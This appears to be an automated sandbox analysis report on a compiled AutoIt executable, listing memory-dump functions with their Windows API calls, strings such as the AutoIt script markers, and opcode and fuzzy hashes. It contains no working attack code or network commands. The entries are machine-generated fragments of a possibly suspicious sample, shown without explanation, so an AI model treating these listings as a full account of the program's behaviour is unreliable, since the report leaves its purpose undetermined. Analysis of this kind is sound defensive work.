Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 9e75bc3ee5ae6fd8629e67845a4fe67b080aeab6026216c80f1d7e7bdb472154
Instruction ID: ecb5862127df1a64b4a8f795491f37c781474d3f81fcf50fbe5c3d5537e2ee3a
Opcode Fuzzy Hash: 9e75bc3ee5ae6fd8629e67845a4fe67b080aeab6026216c80f1d7e7bdb472154
Instruction Fuzzy Hash: 64615B76508300AFD701EFA4DC85E9BBBE8EFC9350F00492EF195921A1DB719A49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A2A5BD, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00A2A636
GetDriveTypeW.KERNEL32 ref: 00A2A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A2A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A2A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A2A730

Strings

close, xrefs: 00A2A63C
open, xrefs: 00A2A65D
close cd wait, xrefs: 00A2A71B
set cd door , xrefs: 00A2A6D1
open , xrefs: 00A2A692
closed, xrefs: 00A2A64A, 00A2A653
type cdaudio alias cd wait, xrefs: 00A2A6AE
wait, xrefs: 00A2A6ED

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: SendString$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1600147383-4113822522
Opcode ID: bf6048598d66621228d98161d18baa19a9af80a8cdb83e18b4f978ad6bf09f3c
Instruction ID: d2a7dd754a93b42c009677c5d55dcf8d81eec13db69d3385ac1a3ae23ff1ffd6
Opcode Fuzzy Hash: bf6048598d66621228d98161d18baa19a9af80a8cdb83e18b4f978ad6bf09f3c
Instruction Fuzzy Hash: 0A515A75504704AFC700EF24D881E6AB7F4FF94718F04896CF88A972A1DB31AE0ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BCED, Relevance: 22.6, APIs: 15, Instructions: 135filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,?,?,00000003,?,?,?,?,?,?,?,?,00A49476,?,?), ref: 00A4BD10
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BD27
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BD32
CloseHandle.KERNEL32(00000000,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BD3F
GlobalLock.KERNEL32 ref: 00A4BD48
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BD57
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BD60
CloseHandle.KERNEL32(00000000,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BD67
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BD78
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A52CAC,?), ref: 00A4BD91
GlobalFree.KERNEL32 ref: 00A4BDA1
GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,00A49476,?,?,00000000,?), ref: 00A4BDC5
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00A4BDF0
DeleteObject.GDI32(00000000), ref: 00A4BE18
SendMessageW.USER32(?,00000172,?,?), ref: 00A4BE2E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 8700c9ac671b0134ea150b42e5996234022aef5638bef55bc453bb36d75e28a7
Instruction ID: 0d26dbcad515248184f45244501ed7d8237a8f7daf1a2516fe19326d5f563eb6
Opcode Fuzzy Hash: 8700c9ac671b0134ea150b42e5996234022aef5638bef55bc453bb36d75e28a7
Instruction Fuzzy Hash: 8C411879600208FFDB11DFA4DC48EAB7BBCEBCA711F104069FA06DA260C7719902DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A27FA4, Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 398timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00A27FE9
VariantCopy.OLEAUT32(?,00000000), ref: 00A27FF2
VariantClear.OLEAUT32(?), ref: 00A27FFE
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A280EC
VarR8FromDec.OLEAUT32(?,?), ref: 00A28148
VariantInit.OLEAUT32(?), ref: 00A281F9
SysFreeString.OLEAUT32(0000000E), ref: 00A2828D
VariantClear.OLEAUT32(?), ref: 00A282E7
VariantClear.OLEAUT32(?), ref: 00A282F6
VariantInit.OLEAUT32(00000000), ref: 00A28334

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00A28116
Default, xrefs: 00A281A9

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: fcf9eaaa47d6c03c81b6eb07a8f2620102b8a3be05b91e82c0e6c706956af4aa
Instruction ID: 4cf543be91e599a8fddadf7306845140117ec0a5e15c0aa4920b51c1e30ad406
Opcode Fuzzy Hash: fcf9eaaa47d6c03c81b6eb07a8f2620102b8a3be05b91e82c0e6c706956af4aa
Instruction Fuzzy Hash: 54D12331509525EFDB20AFA9E844BAAB7B8FF44300F208476F5059B981CF39EC54EB61

Uniqueness

Uniqueness Score: -1.00%

Function 009E90C6, Relevance: 21.1, APIs: 14, Instructions: 120COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 009E9107

Part of subcall function 009F54C8: _free.LIBCMT ref: 009F54E3
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F54F5
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F5507
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F5519
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F552B
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F553D
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F554F
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F5561
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F5573
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F5585
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F5597
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F55A9
Part of subcall function 009F54C8: _free.LIBCMT ref: 009F55BB

_free.LIBCMT ref: 009E90FC

Part of subcall function 009E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,009E9C64), ref: 009E2FA9
Part of subcall function 009E2F95: GetLastError.KERNEL32(00000000,?,009E9C64), ref: 009E2FBB

_free.LIBCMT ref: 009E911A
_free.LIBCMT ref: 009E912F
_free.LIBCMT ref: 009E913A
_free.LIBCMT ref: 009E915B
_free.LIBCMT ref: 009E916E
_free.LIBCMT ref: 009E917C
_free.LIBCMT ref: 009E9187
_free.LIBCMT ref: 009E91B0
_free.LIBCMT ref: 009E91DB
_free.LIBCMT ref: 009E91E2
_free.LIBCMT ref: 009E91FF
_free.LIBCMT ref: 009E9215

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 5bc6b8b814ce4b1ff0c94cee46ba8fe605af243be1f78045f0aef7b8edf84114
Instruction ID: 99a12edb052b2040867ac459f4a84f8a68d762f9dec2516a3f2de09525ad2655
Opcode Fuzzy Hash: 5bc6b8b814ce4b1ff0c94cee46ba8fe605af243be1f78045f0aef7b8edf84114
Instruction Fuzzy Hash: 48414C7160C786AFEB22AB7AD849B5677EDEF45351F14482AF159CA161EA30EC80CB10

Uniqueness

Uniqueness Score: -1.00%

Function 009C6BEC, Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 492COMMON

Download Yara Rule

APIs

Part of subcall function 009E0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,009C6C6C,?,00008000), ref: 009E0BB7

Part of subcall function 009C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C48A1,?,?,009C37C0,?), ref: 009C48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?), ref: 009C6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 009C6E5A

Strings

Error opening the file, xrefs: 009FE866, 009FE8E1
EA06, xrefs: 009FE87B
Unterminated string, xrefs: 009FEC0D
AU3!, xrefs: 009C6CC1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 009FE84A
>>>AUTOIT SCRIPT<<<, xrefs: 009FE8BF
Bad directive syntax error, xrefs: 009FEBC6

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$FullNamePath
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 1801377286-1018226102
Opcode ID: 2081686b196bd5cea7e772e4351ffed8cc4931094151cf1593a38ae70f555b63
Instruction ID: 5e8108049cdf26f0f323e97393e0640d8c48b6ba968939ff52d2d6b2d9054f49
Opcode Fuzzy Hash: 2081686b196bd5cea7e772e4351ffed8cc4931094151cf1593a38ae70f555b63
Instruction Fuzzy Hash: 92026831508345AEC724EF64C881EAFBBE4AFD9354F10492EF585972A1DB30E989CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00A183F4, Relevance: 19.7, APIs: 13, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1874A: GetUserObjectSecurity.USER32 ref: 00A18766
Part of subcall function 00A1874A: GetLastError.KERNEL32(?,?,?,?,?), ref: 00A18770
Part of subcall function 00A1874A: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?), ref: 00A1877F
Part of subcall function 00A1874A: HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00A18786
Part of subcall function 00A1874A: GetUserObjectSecurity.USER32 ref: 00A1879D

Part of subcall function 00A187E7: GetProcessHeap.KERNEL32(00000008,00000001,00000000,00000000,?,00A1843D,?,00000000,00000000,00000000), ref: 00A187F3
Part of subcall function 00A187E7: HeapAlloc.KERNEL32(00000000,?,00A1843D,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A189A7), ref: 00A187FA
Part of subcall function 00A187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A1843D,?,00000000,00000000,00000000), ref: 00A1880B

GetSecurityDescriptorDacl.ADVAPI32(?,000F037F,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A189A7), ref: 00A18458
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A1848C
GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A189A7), ref: 00A1849D
GetAce.ADVAPI32(?,00000000,00000400), ref: 00A184DA
AddAce.ADVAPI32(00000000,00000002,000000FF,00000400,?), ref: 00A184F6
GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A189A7), ref: 00A18513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A18522
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A189A7), ref: 00A18529
GetLengthSid.ADVAPI32(00000000,00000008,00000000), ref: 00A1854A
CopySid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A189A7), ref: 00A18551
AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 00A18582
SetSecurityDescriptorDacl.ADVAPI32(00000001,00000001,00000000,00000000), ref: 00A185A8
SetUserObjectSecurity.USER32 ref: 00A185BC

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 1795222879-0
Opcode ID: 6f4a52606aa5795cffeaca1fd660655bd2df16d77655e79296619853d75158ba
Instruction ID: bd1adbb7ffa1e0e860c99c13de0ad2f482adb5aca1c812c2672e98605e372566
Opcode Fuzzy Hash: 6f4a52606aa5795cffeaca1fd660655bd2df16d77655e79296619853d75158ba
Instruction Fuzzy Hash: ED617B75900109AFDF00CFA0DD45EEEBBB9FF85320F10812AF915A6291DB359A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C49C, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 236windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

PostMessageW.USER32 ref: 00A4C4EC
GetFocus.USER32 ref: 00A4C4FC
GetDlgCtrlID.USER32(00000000), ref: 00A4C507
GetMenuItemInfoW.USER32(?,00000000,?,?), ref: 00A4C65D
GetMenuItemCount.USER32(?), ref: 00A4C67D
GetMenuItemID.USER32(?,?), ref: 00A4C690
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A4C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A4C70C
CheckMenuRadioItem.USER32 ref: 00A4C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A4C779

Strings

0, xrefs: 00A4C62A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: acae99c02847749cd681066b19a3474d79924dc87aab041303ad0389ae5d5390
Instruction ID: aac788140e2c591299b01afa2145b9b7ead923dc57bf266c7b90f032cdc9ffdc
Opcode Fuzzy Hash: acae99c02847749cd681066b19a3474d79924dc87aab041303ad0389ae5d5390
Instruction Fuzzy Hash: E881AD7850A351AFD750CF14C984A6BBBE8FBC9324F10492EF99993291C771E905CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A410A5, Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 123COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A40038,?,?), ref: 00A410BC

Strings

HKCC, xrefs: 00A4118A
HKEY_CURRENT_CONFIG, xrefs: 00A41179
HKEY_CURRENT_USER, xrefs: 00A4119B
HKEY_CLASSES_ROOT, xrefs: 00A4114F
HKLM, xrefs: 00A4113A
HKEY_USERS, xrefs: 00A411BD
HKCR, xrefs: 00A41164
HKCU, xrefs: 00A411AC
HKEY_LOCAL_MACHINE, xrefs: 00A41125
HKU, xrefs: 00A411CE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 6300e2ed756ed03662074452638c9ceece2fab3fdee3a735f4da83ffc7654ad8
Instruction ID: bee4ed28e4888377eb228da28a584b0a0799ae01860f47aeb480589271b6f496
Opcode Fuzzy Hash: 6300e2ed756ed03662074452638c9ceece2fab3fdee3a735f4da83ffc7654ad8
Instruction Fuzzy Hash: 73418C7415028E8BCF10EF94DC91BEA3724FFD5350F508528F8999B291DB70AD9ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A25569, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 77COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A255D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A255E8
mciSendStringW.WINMM(?,?,?,?), ref: 00A255F9
mciSendStringW.WINMM(play PlayMe wait,?,?,?), ref: 00A2560B
mciSendStringW.WINMM(play PlayMe,?,?,?), ref: 00A2561C

Strings

close PlayMe, xrefs: 00A255E3, 00A25610
status PlayMe mode, xrefs: 00A255CD
alias PlayMe, xrefs: 00A255AB
play PlayMe, xrefs: 00A25617
open , xrefs: 00A25581
play PlayMe wait, xrefs: 00A25606

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 6fa1d599748140b8fd7d5e91a5b5ea0d79de1ec26ee7c9319290eb4c31700675
Instruction ID: 345a6d90ba39b35cbf5f6f0affcdc97121b6a50e245e1b2026547158c1bc4d0c
Opcode Fuzzy Hash: 6fa1d599748140b8fd7d5e91a5b5ea0d79de1ec26ee7c9319290eb4c31700675
Instruction Fuzzy Hash: A6119025E5016979E720ABB5DC8AEFFBF3CFFE2B40F408429B405A60D1DA611D05C9B2

Uniqueness

Uniqueness Score: -1.00%

Function 00A25217, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A2521C

Part of subcall function 009E0719: timeGetTime.WINMM(?,73FD8EC0,009D0FF9), ref: 009E071D

Sleep.KERNEL32(0000000A), ref: 00A25248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00A2526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A2528E
SetActiveWindow.USER32 ref: 00A252AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A252BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00A252DA
Sleep.KERNEL32(000000FA), ref: 00A252E5
IsWindow.USER32 ref: 00A252F1
EndDialog.USER32 ref: 00A25302

Strings

BUTTON, xrefs: 00A25280

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 3ce3890faca0cde6a0d5c895fe107084859c21cfd121552381eedbe51ad60fa7
Instruction ID: 01fe4530a58020f02d72f120754f704fab45fde8fe08fd11125404df146846a4
Opcode Fuzzy Hash: 3ce3890faca0cde6a0d5c895fe107084859c21cfd121552381eedbe51ad60fa7
Instruction Fuzzy Hash: 1A21A478504704EFE704DBF4FD88A6A7B69FB86396F102434F106851B1DBB29C428B32

Uniqueness

Uniqueness Score: -1.00%

Function 009C45DF, Relevance: 18.2, APIs: 12, Instructions: 223windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00A86890), ref: 009FD7CD
GetMenuItemCount.USER32(00A86890), ref: 009FD87D
GetCursorPos.USER32(?), ref: 009FD8C1
SetForegroundWindow.USER32(00000000), ref: 009FD8CA
TrackPopupMenuEx.USER32(00A86890,00000000,?,00000000,00000000,00000000), ref: 009FD8DD
PostMessageW.USER32 ref: 009FD8E9

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID:
API String ID: 36266755-0
Opcode ID: f1ac304ae0a54773698749dc2926afb0d9a14adc57cf8217aead98c993070181
Instruction ID: ba4304639aafca3beceee39f7b4459cb7492adcfc48181f0dfa54842b1cf3331
Opcode Fuzzy Hash: f1ac304ae0a54773698749dc2926afb0d9a14adc57cf8217aead98c993070181
Instruction Fuzzy Hash: 3C712975606219BEFB309F64DC49FBABF69FF45364F200216F624AA0D1C7716810DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A2052C, Relevance: 18.2, APIs: 12, Instructions: 192keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000011), ref: 00A205A7
SetKeyboardState.USER32(?), ref: 00A20612
GetAsyncKeyState.USER32(000000A0), ref: 00A20632
GetKeyState.USER32(000000A0), ref: 00A20649
GetAsyncKeyState.USER32(000000A1), ref: 00A20678
GetKeyState.USER32(000000A1), ref: 00A20689
GetAsyncKeyState.USER32(00000011), ref: 00A206B5
GetKeyState.USER32(00000011), ref: 00A206C3
GetAsyncKeyState.USER32(00000012), ref: 00A206EC
GetKeyState.USER32(00000012), ref: 00A206FA
GetAsyncKeyState.USER32(0000005B), ref: 00A20723
GetKeyState.USER32(0000005B), ref: 00A20731

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 5286eda0caa0f33fa90226a5f8809b5be3e9a4fbe02a4a47f2418046868dcafe
Instruction ID: 17157cc373f8b5e7160456603387c82283b4a39bde44ff6297647dc2e5ebb15f
Opcode Fuzzy Hash: 5286eda0caa0f33fa90226a5f8809b5be3e9a4fbe02a4a47f2418046868dcafe
Instruction Fuzzy Hash: 89512E30A047A829FB34DBB8A954FEABFB49F11380F0885BDD5C1561C3D6A49B4CCB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A1C72A, Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00A1C746
GetWindowRect.USER32 ref: 00A1C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A1C7B6
GetDlgItem.USER32 ref: 00A1C7C1
GetWindowRect.USER32 ref: 00A1C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A1C827
GetDlgItem.USER32 ref: 00A1C835
GetWindowRect.USER32 ref: 00A1C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A1C889
GetDlgItem.USER32 ref: 00A1C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A1C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00A1C8C1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 5ac241a884975875811576abcb4a16a12e40c7aabcc953f2711a5b33cc2c2e9c
Instruction ID: 80aa42fd23515925fa887c2ca5cd5eed50c95119476b2ce88c1e11df9708cc32
Opcode Fuzzy Hash: 5ac241a884975875811576abcb4a16a12e40c7aabcc953f2711a5b33cc2c2e9c
Instruction Fuzzy Hash: 3F5164B5A40204BFEB18CFA8DD89EBEBBB9FB89321F14812DF515D6290D7719941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 009C201B, Relevance: 18.2, APIs: 12, Instructions: 172timeCOMMON

Download Yara Rule

APIs

Part of subcall function 009C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009C2036,?,00000000,?,?,?,?,009C16CB,00000000,?), ref: 009C1B9A

